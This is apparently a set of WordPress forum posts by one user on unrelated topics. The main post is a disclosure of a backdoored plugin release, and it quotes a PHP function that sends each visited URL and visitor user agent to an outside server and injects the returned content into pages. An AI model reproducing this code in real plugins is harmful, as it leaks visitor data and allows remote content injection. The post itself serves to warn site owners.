Znuff

it should allow all arbitrary HTML code in there, no reason to baby-sit the users

You didn’t understand what I wrote.

This needs to be emphasized and the plugin download disabled.

I just noticed the behavior on a 2+ years old install.

Specifically:

– The version of this plugin on www.remarpro.com is 5.2.2
– The version installed in my WordPress is 5.2.3

The 5.2.3 version contains a few “extra” things:

1. There’s a directory called updater that uses https://github.com/YahnisElsts/plugin-update-checker

2. The main file contains an update function:

// update functionality
require  dirname(__FILE__).'/updater/plugin-update-checker.php';
$myUpdateChecker = Puc_v4_Factory::buildUpdateChecker(
  //'https://anadnet.com/updates/plugin.json',
  'https://anadnet.com/updates/?action=get_metadata&slug=quick-pagepost-redirect-plugin',
  __FILE__, //Full path to the main plugin file or functions.php.
  'quick-pagepost-redirect-plugin'
);

This function updates the plugin from the Author’s website, and the JSON data you get from them returns: "version": "5.2.3",.

3. The main file now contains a “phone home” function:

add_filter( 'the_content', array( $this, 'filter_the_content_in_the_main_loop' ), -1 );

function filter_the_content_in_the_main_loop( $content ) {
    if (( is_single() || is_singular() || is_page() ) && (!is_user_logged_in()) && is_main_query()  ){
        if ($this->ppr_pro === '1' ){
          if (!defined('CREDIT')) {
          $ctx=stream_context_create(array('http'=>array('timeout' => 3)));
          try{
            $credit=@file_get_contents('https://w.anadnet.com/bro/3/'.$_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] .'QQQ'. urlencode($_SERVER['HTTP_USER_AGENT']).'QQQEND', false, $ctx);
            } catch (Exception $e) {
            }

            return $credit . $content;
            define('CREDIT', 'c');
          }
        }
    }

    return $content;
  }

This will submit ANY URL accessed on your website to the author’s page, and it will return $credit back, together with the $content.

This has the potential to inject content in any of your pages, if the plugin author (or, better said – whoever controls that website) decides to.

I’m not sure how the version 5.2.3 got installed in my wp install, as it’s been running for a few years now.

I have actually made a change to my local copy of WP_Fragment_Cache that can clear individual cache entries.

I’ve added a new parameter to ::output(), that will store cache fragments with “absolute key names” – this will store fragments without the usual file name/path and line number, instead it will store it using the actual provided key name.

Then I added a ::remove() function that will take an absolute key name and will remove the key from the cache.

This is useful to hook into your theme for specific events (ie: when a comment is added, a post is changed etc.), without having to purge the whole cache (why update the whole cache when just a specific fragment changes?).

I would commit it to the main code, but I’m afraid the quality of my documentation is not on par with mariuspass’.

I’d be more of a fan of a CLI version… but I’m a server guy, so take that with a grain of salt ??

It’s only for Images, as the name implies “Image”Lightbox.

More info you can get at https://osvaldas.info/image-lightbox-responsive-touch-friendly

@cmscritic: I’ve been on the devel branch with 2.8 for ages and I never had problems. People should check their idiotic plugins/themes before talking crap around here.

Not buggy, move along.